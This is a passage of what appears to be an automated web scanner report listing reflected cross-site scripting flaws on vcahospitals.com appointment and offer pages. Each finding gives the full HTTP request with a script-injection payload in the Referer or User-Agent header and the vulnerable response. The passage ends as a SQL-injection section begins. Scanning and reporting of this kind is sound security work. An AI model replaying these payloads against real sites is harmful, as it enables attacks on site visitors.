<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=57e77"><script>alert(1)</script>8105a26b689" />
...[SNIP]...

2.127. http://www.vcahospitals.com/main/offer [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93282"><script>alert(1)</script>5b7938f8052 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.1393282"><script>alert(1)</script>5b7938f8052
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=psqbs3kc8ulu01cr19pld79dp0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.1393282"><script>alert(1)</script>5b7938f8052" />
...[SNIP]...

2.128. http://www.vcahospitals.com/main/offer/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9378"><script>alert(1)</script>0a72e423827 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=d9378"><script>alert(1)</script>0a72e423827
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=d9378"><script>alert(1)</script>0a72e423827" />
...[SNIP]...

2.129. http://www.vcahospitals.com/main/offer/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8614f"><script>alert(1)</script>cee15d78e68 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)8614f"><script>alert(1)</script>cee15d78e68
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)8614f"><script>alert(1)</script>cee15d78e68" />
...[SNIP]...

2.130. http://www.vcahospitals.com/main/offer/thank-you.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95362"><script>alert(1)</script>05c6e8d8221 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

POST /main/offer/thank-you.html? HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=95362"><script>alert(1)</script>05c6e8d8221
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:24:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3534
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=95362"><script>alert(1)</script>05c6e8d8221&&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284">
...[SNIP]...

2.131. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/manhattan-veterinary-group/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db8d4"><script>alert(1)</script>1f48bc76e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /manhattan-veterinary-group/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Referer: http://www.google.com/search?hl=en&q=db8d4"><script>alert(1)</script>1f48bc76e1e

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=db8d4"><script>alert(1)</script>1f48bc76e1e" />
...[SNIP]...

2.132. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/manhattan-veterinary-group/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563f8"><script>alert(1)</script>d249be92d3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /manhattan-veterinary-group/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13563f8"><script>alert(1)</script>d249be92d3d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

2.133. http://www.vcahospitals.com/marshfield/appt.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/marshfield/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e160"><script>alert(1)</script>15cad895a97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3e160"><script>alert(1)</script>15cad895a97
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=3e160"><script>alert(1)</script>15cad895a97" />
...[SNIP]...

2.134. http://www.vcahospitals.com/marshfield/appt.html [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/marshfield/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca082"><script>alert(1)</script>1249627b9a5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ca082"><script>alert(1)</script>1249627b9a5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ca082"><script>alert(1)</script>1249627b9a5" />
...[SNIP]...

2.135. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80127"><script>alert(1)</script>19dd3cfa8d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /new-york-veterinary-hospital/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Referer: http://www.google.com/search?hl=en&q=80127"><script>alert(1)</script>19dd3cfa8d8

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=80127"><script>alert(1)</script>19dd3cfa8d8" />
...[SNIP]...

2.136. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec59a"><script>alert(1)</script>132741cca0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /new-york-veterinary-hospital/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ec59a"><script>alert(1)</script>132741cca0f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:13 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ec59a"><script>alert(1)</script>132741cca0f" />
...[SNIP]...

2.137. http://www.vcahospitals.com/plymouth/appt.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483eb"><script>alert(1)</script>df4b8d58b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /plymouth/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Referer: http://www.google.com/search?hl=en&q=483eb"><script>alert(1)</script>df4b8d58b4d

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=483eb"><script>alert(1)</script>df4b8d58b4d" />
...[SNIP]...

2.138. http://www.vcahospitals.com/plymouth/appt.html [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01dc"><script>alert(1)</script>4fe18f93ad was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /plymouth/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13d01dc"><script>alert(1)</script>4fe18f93ad
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13d01dc"><script>alert(1)</script>4fe18f93ad" />
...[SNIP]...

3. SQL statement in request parameter previous next
There are 4 instances of this issue:

/main/offer
/main/offer/
/main/offer/thank-you.html
/tools/markers_sema.php

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

